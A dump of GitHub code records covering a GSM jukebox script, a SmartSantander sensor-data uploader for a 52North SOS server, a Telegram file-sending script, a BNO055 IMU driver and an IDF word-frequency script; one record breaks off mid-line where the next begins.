player.poll() != None:\n\t\t\t\t\t\tprint_dbg('SONG FINISHED - HANGUP')\n\t\t\t\t\t\tplayer = None\n\t\t\t\t\t\tself.command('ATH')\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint_dbg('still playing')\n\t\t\t\tif timeout_cnt <= 0:\n\t\t\t\t\tprint_dbg('TIMEOUT - HANGUP')\n\t\t\t\t\tself.command('ATH')\n\n\n\tdef __handle_call(self, line):\n\t\tprint_dbg('TODO handle call')\n\n\tdef command(self, command, response='OK', timeout=10):\n\t\twith self.lock:\n\t\t\tself.write_line(command)\n\t\t\tif response is None:\n\t\t\t\treturn\n\t\t\tlines = []\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\tline = self.responses.get(timeout=timeout)\n\t\t\t\t\tif line == response:\n\t\t\t\t\t\treturn lines\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint_dbg('CHECK RESPONSE: ', line)\n\t\t\t\t\t\tlines.append(line)\n\t\t\t\texcept queue.Empty:\n\t\t\t\t\traise ATException('AT command timeout ({!r})'.format(command))\n\nif __name__ == '__main__':\n\timport time\n\tser = serial.serial_for_url('/tmp/ttyV0', baudrate=9600, timeout=1)\n\twith serial.threaded.ReaderThread(ser, WurlitzerProtocol) as wurlitzer:\n\t\twurlitzer.init_module()\n\t\twurlitzer.load_playlist('playlist.txt')\n\t\twurlitzer.command('AT')\n\t\traw_input('Press Enter to continue')\n\n","repo_name":"sehaas/gsmwurlitzer","sub_path":"wurlitzer.py","file_name":"wurlitzer.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"4278181148","text":"\"\"\"\r\nReads JSON files and uploads sensor data to the 52North SOS implementation. Code is tuned to work with data from SmartSantander project: http://www.smartsantander.eu/\r\nIt formats data into the body of POST request using JSON, and uploads data into a SOS with a JSON binding.\r\nA JSON file with the following structure is required:\r\n{\"markers\": [ {\"id\": \"anyvalue\", \"anyelement\": \"anyvalue\",... , ...\"tags\": \"from an specified list of tags\"}]}\r\nPermission to perform transactional operations should be enable in the SOS.\r\nRedundant data (e.g., data with the same Id and time stamp) is ignored.\r\n\r\nIt includes several options to upload data using multiple threads. This may crash the service if it cannot handle all request, this depends on the rubustness of the server and the SOS implementation itself.\r\n\r\nCreate: May 25, 2017\r\nAuthor: Manuel G. Garcia\r\n\r\n\"\"\"\r\n\r\nimport json as json\r\nimport os\r\nimport re\r\nimport glob\r\nimport datetime\r\nimport requests\r\nimport concurrent.futures\r\nimport time as time_\r\nfrom . import wrapper\r\nfrom . import transactional\r\n\r\n# OM_types dictionary\r\nom_types = {\"m\": \"OM_Measurement\",\r\n \"co\": \"OM_CategoryObservation\",\r\n \"cto\": \"OM_CountObservation\",\r\n \"to\": \"OM_TextObservation\",\r\n \"go\": \"OM_GeometryObservation\",\r\n \"tho\": \"OM_TruthObservation\"}\r\n\r\n\r\ndef num(s): # Necessary to convert longitude and latitude from a string to a number.\r\n \"\"\"\r\n Convert string into a number (float or integer)\r\n :param s: string containing only digits\r\n :return: float or integer\r\n \"\"\"\r\n try:\r\n return int(s)\r\n except ValueError:\r\n return float(s)\r\n\r\n\r\ndef timeFromFile(filename=str):\r\n \"\"\"\r\n Extract the date and time which is part of a file name. Ex: 'data_stream-2016-07-21T135509.json'. 
Use when time is not reported for each sensor.\r\n    :param filename: string which contains a date and time\r\n    :return: time stamp in ISO format\r\n    \"\"\"\r\n    time_st = re.findall(r\"\\d\\d\\d\\d[-]\\d\\d[-]\\d\\d[T]\\d+\", filename)\r\n    iso_time = time_st[0][:10] + \" \" + time_st[0][11:13] + \":\" + time_st[0][13:15] + \":\" + time_st[0][15:]\r\n\r\n    return iso_time\r\n\r\n\r\ndef history(hist_directory):\r\n    '''\r\n    Opens a history file or creates a new one at the root directory.\r\n    A history file keeps a record of which sensors and observations have been processed.\r\n    File structure = {node: {count: int, latest: time_of_last_observation}}\r\n    :param hist_directory: path to the directory that stores history files.\r\n    :return: The newest history file in the root directory OR\r\n    an empty history file\r\n    '''\r\n\r\n    os.chdir(hist_directory) # change the working directory\r\n\r\n    try:\r\n        # load latest modified history file\r\n        newest = max(glob.iglob('*.json'), key=os.path.getmtime)\r\n        his = open(newest)\r\n        pool = json.load(his)\r\n        his.close()\r\n    # when no history file is found\r\n    except ValueError: # on empty directory\r\n        # raise message\r\n        print('------------------------------------')\r\n        print('WARNING!:')\r\n        print('Empty directory for history files')\r\n        print('Starting new record')\r\n        print('------------------------------------')\r\n        pool = {} # start an empty dictionary for history\r\n    return pool\r\n\r\n\r\ndef loadData(root_directory, file_name, nest='markers'):\r\n    '''\r\n    Opens and reads a json file in the root directory\r\n    :param root_directory: path to directory containing json files.\r\n    :param file_name: file name\r\n    :param nest: key name of the uppermost object in the JSON file, which is an array. Default 'markers'\r\n    :return: dictionary containing json objects\r\n    '''\r\n    # open file\r\n    with open(root_directory + file_name) as f:\r\n        jdata = json.load(f)\r\n    jdata = jdata[nest]\r\n    return jdata\r\n\r\n\r\ndef cleanData(objectlist, has_tag: str, time_attrib=True):\r\n    \"\"\"\r\n    Check that objects in a list contain the elements: 'id', georeference, valid time and tags.\r\n    :param objectlist: a list containing valid JSON objects. As returned by the loadData function.\r\n    :param has_tag: objects with this tag name will be kept. The rest will be removed.\r\n    :param time_attrib: When False the time attribute check will be skipped.\r\n    :return: a list of json objects\r\n    \"\"\"\r\n    # counter for removed objects\r\n    i = 0\r\n    cleanList = []\r\n    for o in objectlist:\r\n        # Keep objects with key 'id' and tag = has_tag\r\n        # Keep objects with georeference, e.g. 
'longitude' not null and 'longitude'/'latitude' is not zero.\r\n        if ('id' in o\r\n                and o[\"longitude\"] is not None and\r\n                o[\"tags\"] == has_tag and\r\n                num(o[\"longitude\"]) != 0.0 and\r\n                num(o[\"latitude\"]) != 0.0):\r\n            # filter based on valid time.\r\n            if time_attrib is True:\r\n                try:\r\n                    if 'Last update' in o:\r\n                        reported_time = o['Last update'] # reported time\r\n                    else:\r\n                        reported_time = o['LastValue'] # Another key for time (in waste collector)\r\n                except KeyError: # When the object does not have this key\r\n                    print(\"*** Object has no 'Time' attribute ***\")\r\n                    continue # Go to the next object\r\n                else: # if object has time attribute\r\n                    # Filter zero time\r\n                    if reported_time != '0000-00-00 00:00:00': # Sensors/observations will be added\r\n                        # only when objects hold a valid time\r\n                        cleanList.append(o) # add to clean list.\r\n            else: # when time attribute is false\r\n                cleanList.append(o)\r\n        else:\r\n            # print('------------------------')\r\n            # print(\"!!!No 'id' name in object: \" + str(i))\r\n            # print('------------------------')\r\n            i += 1 # increase counter\r\n    print(str(i) + ' Objects were removed!')\r\n\r\n    return cleanList\r\n\r\n\r\nclass Sos():\r\n    def __init__(self, url, token=''):\r\n        self.sosurl = str(url) # url to access the SOS\r\n        self.token = str(token) # security token, optional\r\n        # Test if URL exists\r\n        try:\r\n            test = requests.get(self.sosurl)\r\n            # TODO: test for token authorization\r\n            test.raise_for_status()\r\n        except requests.HTTPError:\r\n            print(\"The URL is not valid\")\r\n\r\n\r\ndef upload_directory2sos(sos, directory, sensor_type, history_path, threads=1, time_attribute=True,\r\n                         spatial_profile=True):\r\n    \"\"\"\r\n    Parses all JSON files in a directory, prepares SOS requests for registering sensors and observations, and uploads data to an existing SOS.\r\n    Application is limited by an intense use of memory when a directory contains a very large number of files.\r\n    The use of multiple threads may crash the SOS. To limit the number of crashes, the function will stop for 20 seconds after every 50 files.\r\n    :param sos: Object describing an existing SOS with valid URL and token.\r\n    :param directory: path to the directory which contains the JSON files.\r\n    :param sensor_type: the type of sensors for which requests will be prepared (e.g., 'light', 'weather_station', etc.)\r\n    :param history_path: path to directory for history logs\r\n    :param threads: number of threads for multi-thread uploading. Default is 1 thread.\r\n    :param time_attribute: states if the specific sensor type contains a time attribute or not. Default is True.\r\n    :param spatial_profile: switches between the use of insertObservationSP (True) and insertObservation (False).\r\n    :return: None\r\n    \"\"\"\r\n\r\n    json_files = os.listdir(directory) # list all files in directory\r\n    counter = 0 # initiate counter for monitoring progress\r\n    start_time = datetime.datetime.now()\r\n    print('=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/')\r\n    print('Process started at: ', str(start_time))\r\n    print('PROCESSING all files in directory: ', directory)\r\n\r\n    for f in sorted(json_files): # loop over json files. 
Files sorted by name.\r\n print('---->>Working on file: ', f)\r\n print(' >> Parsing file ', str(counter + 1), ' out of: ', str(len(json_files)))\r\n print('----------------------------------------------------------')\r\n # Load data from JSON file and prepare requests\r\n request_collection = requests_from_file(directory, f, sensor_type, history_path, time_attribute,\r\n spatial_profile)\r\n\r\n upload2sos(sos, request_collection, history_path, threads)\r\n counter += 1\r\n\r\n # Put the program to sleep after processing 'n' files.\r\n n = 50\r\n if counter > 0 and (counter % n) == 0:\r\n wait_time = 20 # time in seconds\r\n # print('=============================================')\r\n print('\\n >>> The monkey is tired <<< ')\r\n print(' ********************* ')\r\n print(' ** ** ')\r\n print(' ** GETTING MORE ** ')\r\n print(' ** BANANAS ** ')\r\n print(' ** ** ')\r\n print(' ********************* ')\r\n print(' >>> Wait ', wait_time, ' seconds ', ' <<< ')\r\n # print('=============================================')\r\n time_.sleep(wait_time)\r\n else:\r\n pass\r\n\r\n end_time = datetime.datetime.now()\r\n elapse_t = end_time - start_time\r\n print('------------------------------')\r\n print('>> Directory Upload Complete <<')\r\n print('-> Total upload time: ' + str(elapse_t))\r\n print('------------------------------')\r\n\r\n return None\r\n\r\n\r\ndef requests_from_file(directory, file_name, sensor_type, hist_path, time_attrib=True, spatial_profile=True):\r\n \"\"\"\r\n Parse a single JSON file and prepare SOS requests for registering sensors and observations.\r\n\r\n :param directory: path to the directory which contains a JSON file\r\n :param file_name: name of a JSON file containing sensor data\r\n :param sensor_type: the type of sensors for which requests will be prepare (e.g., 'light', 'weather_station', etc.)\r\n :param hist_path: path to directory for history logs\r\n :param time_attrib: states if specific sensor type contains a time attribute or not. 
Default is True.\r\n :param spatial_profile: switches between the use of insertObservationSP (True) to insertObservation (False).\r\n :return: a list of valid requests, and up-to-date history log\r\n \"\"\"\r\n\r\n print('=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/')\r\n print('PROCESSING a single file: ', file_name)\r\n print('----------------------------------------------------------')\r\n\r\n jdata = loadData(directory, file_name)\r\n\r\n # ------------------------------\r\n # Parsing Parameters:\r\n # ------------------------------\r\n # sensor type\r\n type_sensor = wrapper.SensorType(sensor_type)\r\n sensor_attrib = type_sensor.pattern['attributes']\r\n # parsing history\r\n hist = history(hist_path)\r\n # Remove invalid objects\r\n # print(type_sensor.pattern['name'])\r\n clean_obj = cleanData(jdata, type_sensor.pattern['name'], time_attrib)\r\n\r\n # Chose Insert Observation function:\r\n if spatial_profile is True:\r\n insertobservation = transactional.insertObservationSP # with Transactional Profile\r\n else:\r\n insertobservation = transactional.insertObservation # without it\r\n\r\n # Chose Inser Sensor function:\r\n if type_sensor.pattern['type'] == 'mobile':\r\n insertsensor = transactional.insertMobileSensor\r\n else:\r\n insertsensor = transactional.insertSensor\r\n\r\n prepared_requests = [] # request collector\r\n for o in clean_obj: # loop over each object in input file\r\n ide = o['id']\r\n if ide in hist:\r\n # if node was previously processed\r\n # fetch time:\r\n if time_attrib:\r\n t = o['Last update']\r\n else:\r\n # TODO: time needs transformation wrt server-time\r\n t = timeFromFile(file_name) # get time form file name\r\n\r\n if t not in hist[str(ide)][\"times\"]: # check if object has new time\r\n # change time format\r\n tt = t.split()\r\n time = tt[0] + 'T' + tt[1] + '+00:00'\r\n body = wrapper.Batch(ide) # initiate batch instance\r\n\r\n for a in sensor_attrib: # loop over each attribute\r\n\r\n # OM type\r\n om = type_sensor.om_types[a[1]]\r\n # define procedure\r\n procedure = wrapper.Procedure(ide, a[0], 'http://www.geosmartcity.nl/test/observableProperty/', om)\r\n off_name = 'offering for ' + ide + '_' + type_sensor.pattern['name']\r\n # WARNING: defining an offering for each node\r\n offering = wrapper.Offering('http://www.geosmartcity.nl/test/offering/', ide, off_name)\r\n # Indexing observation identifier\r\n # Index := ide_count+1\r\n new_ide = ide + '_' + \"\".join(a[0].split()) + '_' + str(\r\n hist[ide]['count'] + 1) # ID like: ide_(count +1)\r\n\r\n observation = wrapper.Observation(new_ide)\r\n observation.uom = om\r\n observation.phTime, observation.rTime = time, time # same time for both\r\n # fetch observation value\r\n\r\n # Skip 'Location' attribute\r\n if a[1] != \"go\":\r\n\r\n # Get value for attribute in TypeSensor object\r\n try:\r\n val = str(o[a[0]])\r\n # get numeric value\r\n except KeyError: # when key doesn't exits in object\r\n continue # Skip request for this attribute\r\n val_num = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", val)\r\n\r\n # change to float data type\r\n if len(\r\n val_num) == 0: # Node attribute had not data, or reported an empty (regarded as Null) value.\r\n print('Empty val_num for: ' + str(ide))\r\n if om == \"OM_Measurement\":\r\n observation.Value = -9.99 # alternative 'null' value for 'float' types\r\n elif om == \"OM_CountObservation\":\r\n observation.Value = -1111 # alternative 'null' value for 'integer' type\r\n else: # TODO: add more alternative values\r\n continue\r\n # Fetch 
magnitude\r\n unit = ''.join([i for i in val if not i.isdigit()])\r\n for character in [\" \", \".\", \"-\"]:\r\n unit = unit.replace(character, \"\")\r\n observation.unit = unit\r\n else:\r\n observation.Value = num(val_num[0]) # value of the observation\r\n # Fetch magnitud for the value:\r\n # observation.unit = re.sub((val_num[0] + ' '), \"\", val, count=1)\r\n unit = ''.join([i for i in val if not i.isdigit()])\r\n for character in [\" \", \".\", \"-\"]:\r\n unit = unit.replace(character, \"\")\r\n observation.unit = unit\r\n\r\n else: # For goemetry observation\r\n observation.Value = None\r\n observation.unit = None\r\n\r\n # feature of interest:\r\n coord = (float(o['longitude']), float(o['latitude']), -9.99) # No data := -9.99\r\n foi = wrapper.FoI('degree', 'm', coord, ide)\r\n # prepare body request\r\n if type_sensor.pattern[\"type\"] == \"mobile\":\r\n body_obs = insertobservation(observation, foi, offering, procedure, a[0])\r\n else:\r\n body_obs = insertobservation(observation, foi, offering, procedure, a[0])\r\n body.add_request(body_obs) # collect insert observation request\r\n\r\n prepared_requests.append(body)\r\n\r\n # After insert observation (parsing) is successful\r\n # update sensor history\r\n old_val = hist[ide][\"count\"]\r\n hist[ide][\"count\"] = old_val + 1 # update counter\r\n hist[ide][\"times\"].append(t) # store new time\r\n else:\r\n continue\r\n\r\n else:\r\n # if node is new in hist\r\n # insert sensor to SOS\r\n # print('NEW ' + type_sensor.pattern['name'] + ' SENSOR for: ' + str(ide))\r\n # phenomena / result time:\r\n if time_attrib:\r\n try:\r\n t = o['Last update']\r\n except KeyError:\r\n t = o['LastValue'] # special case (waste collector)\r\n\r\n else:\r\n # TODO: time needs transformation wrt server-time\r\n t = timeFromFile(file_name) # get time form file name\r\n\r\n # change time format\r\n tt = t.split()\r\n time = tt[0] + 'T' + tt[1] + '+00:00'\r\n\r\n body_sensor = \"\"\r\n\r\n # Start batch instance\r\n body = wrapper.Batch(ide)\r\n\r\n # Prepare Sensor Registration:\r\n for a in sensor_attrib:\r\n\r\n # OM type\r\n om = type_sensor.om_types[a[1]]\r\n # print(type_sensor.om_types[a[1]])\r\n\r\n # define procedure\r\n procedure = wrapper.Procedure(ide, a[0], 'http://www.geosmartcity.nl/test/observableProperty/', om)\r\n off_name = 'offering for ' + ide + '_' + type_sensor.pattern['name']\r\n # WARNING: defining an offering for each node\r\n offering = wrapper.Offering('http://www.geosmartcity.nl/test/offering/', ide, off_name)\r\n\r\n # feature of interest:\r\n try:\r\n coord = (float(o['longitude']), float(o['latitude']), -9.99) # No data := -9.99\r\n except TypeError:\r\n print(o)\r\n\r\n # Feature of interest\r\n foi = wrapper.FoI('degree', 'm', coord, ide)\r\n\r\n # prepare body for insert sensor\r\n body_sensor = insertsensor(offering, procedure, foi, type_sensor)\r\n body.add_request(body_sensor) # append insert sensor request\r\n\r\n # Prepare Insert Observation Requests:\r\n cuenta = 0\r\n\r\n for a in sensor_attrib:\r\n # OM type\r\n om = type_sensor.om_types[a[1]]\r\n # define procedure\r\n procedure = wrapper.Procedure(ide, a[0], 'http://www.geosmartcity.nl/test/observableProperty/', om)\r\n off_name = 'offering for ' + ide + '_' + type_sensor.pattern['name']\r\n # WARNING: defining an offering for each node\r\n offering = wrapper.Offering('http://www.geosmartcity.nl/test/offering/', ide, off_name)\r\n\r\n # Indexing observation identifier\r\n new_ide = ide + '_' + \"\".join(a[0].split()) + '_1' # ID like: ide_(count +1)\r\n # 
print(\"id: \"+new_ide)\r\n observation = wrapper.Observation(new_ide)\r\n observation.uom = om\r\n observation.phTime, observation.rTime = time, time # same time for both\r\n\r\n # Skip 'Location' attribute\r\n if a[1] != \"go\":\r\n\r\n # fetch observation value\r\n try: # Avoid stop, when sensor type report different attributes\r\n val = str(o[a[0]])\r\n # get numeric value\r\n except KeyError:\r\n # print('Sensor without this attribute..!!!' + ' Sensor: ' + str(ide) +' attribute: ' + str(a))\r\n continue\r\n val_num = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", val)\r\n # change to float data type\r\n # print(\"type of measurement:\", om)\r\n if len(val_num) == 0:\r\n print('Empty val_num for: ' + str(ide))\r\n if om == \"OM_Measurement\":\r\n observation.Value = -9.99 # alternative 'null' value for 'float' data type in Database\r\n elif om == \"OM_CountObservation\":\r\n observation.Value = -1111 # alternative 'null' value for 'integer' data type in Database\r\n else: # TODO: add more alternative values\r\n continue\r\n # Fetch magnitude\r\n # When No magnitude an empty string is returned.\r\n unit = ''.join([i for i in val if not i.isdigit()])\r\n for character in [\" \", \".\", \"-\"]:\r\n unit = unit.replace(character, \"\")\r\n # print(\"unit at: \", o[\"id\"], \" for \", a, \" is: \", unit)\r\n observation.unit = unit # val should contain only the magnitud\r\n\r\n else:\r\n observation.Value = num(val_num[0]) # value of the observation\r\n # Fetch magnitud for the value:\r\n # observation.unit = re.sub((val_num[0] + ' '), \"\", val, count=1)\r\n unit = ''.join([i for i in val if not i.isdigit()])\r\n for character in [\" \", \".\", \"-\"]:\r\n unit = unit.replace(character, \"\")\r\n # print(\"unit at: \", o[\"id\"], \" for \", a, \" is: \", unit)\r\n observation.unit = unit\r\n else: # For goemetry observation\r\n observation.Value = None\r\n observation.unit = None\r\n\r\n # feature of interest:\r\n coord = (float(o['longitude']), float(o['latitude']), -9.99) # No data := -9.99\r\n foi = wrapper.FoI('degree', 'm', coord, ide)\r\n\r\n # insert observation to SOS\r\n if type_sensor.pattern[\"type\"] == \"mobile\":\r\n # TODO: modify insert sensor function for mobile sensors\r\n body_obs = insertobservation(observation, foi, offering, procedure, a[\r\n 0]) # TODO: Fix, this will produce an error if a mobile sensor is declared\r\n else:\r\n body_obs = insertobservation(observation, foi, offering, procedure, a[0])\r\n body.add_request(body_obs) # add observation request\r\n cuenta += 1\r\n prepared_requests.append(body)\r\n\r\n # After sensor and observation are successful\r\n # Update sensor history with new record\r\n\r\n hist[ide] = {\"count\": 1, \"times\": [t]}\r\n\r\n # insert parsing history. TODO: Is this necessary?\r\n # hist[\"last parsed\"] = {\"runtime error\": {}, \"file name\" : '', \"run time\": ''}\r\n\r\n return {\"requests\": prepared_requests, \"history\": hist, \"file\": file_name}\r\n\r\n\r\ndef upload2sos(sos, request_collection, hist_path, threads=1):\r\n \"\"\"\r\n Upload data to a SOS using HTTP POST requests\r\n :param sos: Object describing an existing SOS\r\n :param request_collection: dictionary containing: HTTP requests, historic log, and name parsed file. Each request is an instance of Batch class\r\n :param hist_path: directory in which the history log files will be saved\r\n :param threads: number of threads for multi-thread uploading. 
Default is 1 thread.\r\n    :return: None\r\n    \"\"\"\r\n    # TODO: currently it works for a single file (a list of Batch objects). Extend it to deal with multiple files; including a 'sleep' time might not be of practical use.\r\n    # If new requests were created\r\n    err_log = {} # initiate error log\r\n    num_posts = len(request_collection['requests']) # number of requests\r\n    hist = request_collection['history']\r\n    file_name = request_collection['file']\r\n    re_quests = request_collection['requests']\r\n\r\n    start_time = datetime.datetime.now()\r\n\r\n    if num_posts > 0:\r\n        # send requests\r\n        print('-----------------------------')\r\n        print('UPLOADING DATA TO: ' + sos.sosurl)\r\n        print('SENDING ', str(num_posts), ' REQUESTS...', 'Using:', str(threads), 'threads')\r\n        print(\"WARNING: Uploading redundant data won't be flagged\", '...working to fix it...')\r\n        # wrapper.sosPost(my_requests[count].reqs(), url, token, response=False)\r\n        # my_requests.clear()\r\n        # count += 1\r\n\r\n        with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:\r\n            future_to_req = {executor.submit(wrapper.sosPost, reques.reqs(), sos.sosurl, sos.token, True): reques for\r\n                             reques in re_quests}\r\n            for future in concurrent.futures.as_completed(future_to_req):\r\n                req = future_to_req[future] # Batch instances\r\n                # print(future.result())\r\n                try:\r\n                    # TODO: server is not reporting errors when sending redundant data. Check sosPost as well.\r\n                    # # print('hello')\r\n                    future.result()\r\n                    # # future.result()\r\n                except Exception as exc:\r\n                    future.exception()\r\n                    err_log[str(datetime.datetime.now())] = [req.id, exc, req.body]\r\n                    print('%r generated an exception: %s Request: %s' % (req.id, exc, req.body))\r\n\r\n        e_time = datetime.datetime.now()\r\n\r\n        wait = e_time - start_time\r\n        reqs_per_post = len(re_quests) # an approximation\r\n        # print('Upload time: ', file_name, str(wait), )\r\n        print('SOS server load: ', str(round(reqs_per_post / wait.total_seconds(), 1)), 'Rps')\r\n        # print('Accumulated time: ', str(datetime.datetime.now() - start_time))\r\n        print('------------------------------')\r\n        request_collection.clear()\r\n        # count += 1\r\n\r\n        # update history log file:\r\n        updateHistory(hist_path, file_name, hist, err_log)\r\n\r\n    # report that no new requests were sent\r\n    else:\r\n        print(\"*** No NEW sensors nor NEW observations in file %r ***\" % file_name)\r\n        # count += 1\r\n\r\n    # Create an error log file if any errors are reported during uploading\r\n    if len(err_log) > 0:\r\n        # file name\r\n        efile = 'runtime-errors' + datetime.datetime.now().strftime(\"%Y-%m-%dT%H%M%S\") + '.log'\r\n        ef = open(hist_path + efile, 'w') # save to same directory as history log files\r\n        json.dump(err_log, ef)\r\n        ef.close()\r\n\r\n    end_time = datetime.datetime.now()\r\n    elapse_t = end_time - start_time\r\n    print('------------------------------')\r\n    print('File Upload Complete')\r\n    print('Upload time: ' + str(elapse_t))\r\n    print('------------------------------')\r\n\r\n    return None\r\n\r\n\r\ndef updateHistory(hist_path, file_name, latest_history_log, error_log):\r\n    \"\"\"\r\n    Updates the history log of requests sent to the SOS server. 
It writes a new file containing the latest changes to a local directory.\r\n    If errors occurred in the server, an error log will be added to the history file\r\n    :param hist_path: path to a directory to store the new (updated) history log file\r\n    :param file_name: name of the source file which is being uploaded.\r\n    :param latest_history_log: up-to-date history log, formatted as JSON\r\n    :param error_log: error reports. Formatted as JSON\r\n    :return: new history log file formatted as JSON\r\n    \"\"\"\r\n    hist = latest_history_log\r\n    hist['last upload'] = {\"name\": file_name, \"run time\": str(datetime.datetime.now()), \"runtime error\": error_log}\r\n    fname = 'hist-' + datetime.datetime.now().strftime(\"%Y-%m-%dT%H%M%S\") + '.json'\r\n    fn = open(hist_path + fname, 'w') # create new history file\r\n    json.dump(hist, fn) # write to file\r\n    fn.close()\r\n    print(\"History log file was updated!!\")\r\n    return None\r\n\r\n# TODO: URIs from waste sensors are not valid. They contain spaces and special characters. They have to be removed\r\n\r\n\r\ndef main():\r\n\r\n    # TODO: Write some tests\r\n    # dir = 'c:/sos_santander/raw_data/sample/'\r\n    # f_name = \"santander_example_data.json\"\r\n    # f_name2 = \"data_stream-2016-07-01T080007.json\"\r\n    # h_dir = 'c:/Temp/hist_temp/'\r\n\r\n    url = 'http://xx.xx.xx.xxxx:8080/sos-4.4/service'\r\n    token = 'TWFudWVsIEdhcmNpYQ=='\r\n    # rq = requests_from_file(dir, f_name, 'bus', h_dir, time_attrib=True)\r\n\r\n    # r = rq[\"requests\"][0]\r\n    # print(r.reqs())\r\n\r\n    sos = Sos(url, token)\r\n\r\n    # upload2sos(sos, rq, h_dir, 3)\r\n\r\n    # upload_directory2sos(sos, dir, 'light', h_dir,3)\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","repo_name":"manuGil/py4sos","sub_path":"py4sos/santander.py","file_name":"santander.py","file_ext":"py","file_size_in_byte":29243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"27059874618","text":"import asyncio\nimport os\n\nimport requests\nfrom pyrogram import Client\nfrom environs import Env\nfrom sys import argv\nimport sys\nfrom os import remove\nfrom re import match\nfrom requests import get\nfrom urllib import parse\nimport json\nimport time\n\nenv = Env()\nenv.read_env()\n\ndata = json.loads(open(\"./media/sendFile/data.json\", \"r\").read())\n\nchat_id = data['chat_id']\ncaption = data['caption']\nfileType = data['fileType']\ntoken = data['token']\nurl = str(data['url'])\ncallback_url = str(data['callback_url'])\n\nex = url.split(\".\")[-1]\n\nfile_name = f\"media/sendFile/{time.time() * 1000}.{ex}\"\n\nwith open(file_name, \"wb\") as f:\n print(\"Downloading %s\" % url)\n response = requests.get(url, stream=True)\n total_length = response.headers.get('content-length')\n d1 = ''\n d2 = ''\n if total_length is None: # no content length header\n f.write(response.content)\n else:\n dl = 0\n total_length = int(total_length)\n start_time = round(time.time())\n for data in response.iter_content(chunk_size=4096):\n f.write(data)\n dl += len(data)\n now_time = round(time.time())\n if (now_time - 3) >= start_time:\n\n start_time = now_time\n\n d1 = round(dl / (1024 * 1024), 2)\n d2 = round(total_length / (1024 * 1024), 2)\n\n done = int(50 * int(d1) / int(d2))\n sys.stdout.write(\"\\r[%s%s]\" % ('=' * done, ' ' * (50 - done)))\n sys.stdout.flush()\n\n if match(r\"^(.*)\\?(.*)=(.*)$\", callback_url):\n get(f\"{callback_url}&down={d1}&size={d2}&status=downloading\")\n else:\n get(f\"{callback_url}?down={d1}&size={d2}&status=downloading\")\n get(f\"{callback_url}?down={d1}&size={d2}&status=downloaded\")\n\n\ndef progress(down, size):\n down = round(down / (1024 * 1024), 2)\n size = round(size / (1024 * 1024), 2)\n done = int(50 * int(down) / int(size))\n sys.stdout.write(\"\\r[%s%s]\" % ('=' * done, ' ' * (50 - done)))\n sys.stdout.flush()\n\n if match(r\"^(.*)\\?(.*)=(.*)$\", callback_url):\n get(f\"{callback_url}&send={down}&size={size}&status=progress\")\n else:\n get(f\"{callback_url}?send={down}&size={size}&status=progress\")\n\n\nasync def main(file):\n async with Client(\"bot\", api_id=env.int(\"api_id\"), api_hash=env.str(\"api_hash\"), bot_token=token) as app:\n # Send a message, Markdown is enabled by default\n\n if fileType == \"video\":\n res = await app.send_video(chat_id=chat_id, caption=caption, video=file, progress=progress)\n elif fileType == \"audio\":\n res = await app.send_audio(chat_id=chat_id, caption=caption, audio=file, progress=progress)\n elif fileType == \"document\":\n res = await app.send_document(chat_id=chat_id, caption=caption, document=file, progress=progress)\n elif fileType == \"photo\":\n res = await app.send_photo(chat_id=chat_id, caption=caption, photo=file, progress=progress)\n else:\n return []\n return res\n\n\nloop = asyncio.get_event_loop()\n\nloop.run_until_complete(main(file=file_name))\n\nos.remove(file_name)\n\nif match(r\"^(.*)\\?(.*)=(.*)$\", callback_url):\n get(f\"{callback_url}&status=finish\")\nelse:\n get(f\"{callback_url}?status=finish\")","repo_name":"ExcelentProgrammer/api","sub_path":"sendFile/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"14868630528","text":"import struct\nimport pyb\n\n\nSCL = pyb.Pin(pyb.Pin.cpu.B8)\nSDA = pyb.Pin(pyb.Pin.cpu.B9)\n\n\nclass BNO055:\n def __init__(self, addr,i2c):\n self.addr = addr\n self.i2c = i2c\n self.changeMode(0x00)\n self.changeMode(0x0C)\n\n \n def changeMode(self, data):\n self.i2c.mem_write(data,self.addr, 0x3D)\n \n def getCalibStatus(self):\n buf = bytearray(1)\n self.i2c.mem_read(buf,self.addr, 0x35)\n \n cal_status = ( buf[0] & 0b11,\n (buf[0] & 0b11 << 2) >> 2,\n (buf[0] & 0b11 << 4) >> 4,\n (buf[0] & 0b11 << 6) >> 6)\n return cal_status\n \n def getCalibCoef(self):\n buf = bytearray(22)\n self.i2c.mem_read(buf,self.addr, 0x55)\n return buf\n \n \n def writeCalibCoef(self, data):\n self.i2c.mem_write(data,self.addr, 0x55)\n \n def readEuler(self):\n buf = bytearray(6)\n self.i2c.mem_read(buf, self.addr, 0x1A)\n eul_signed_ints = struct.unpack(' 0:\n word2IDF[key] = idf\n\nword2IDF = sorted(word2IDF.items(), key=lambda kv: kv[1])#, reverse=True)\n\nidf_file = '{}/data/{}/idf_files/idf.txt'.format(PROJECT_FOLDER, DATASET)\nwith open(idf_file, 'w') as fout:\n for t in word2IDF:\n if t[0] in STOPWORDS or t[0] in PUNCS:\n continue\n fout.write('{}\\t{}\\t{}\\n'.format(t[0], t[1], word2freq[t[0]]))\n","repo_name":"ellenmellon/CGRG","sub_path":"prepare_data/compute_idf_dstc.py","file_name":"compute_idf_dstc.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"91"}
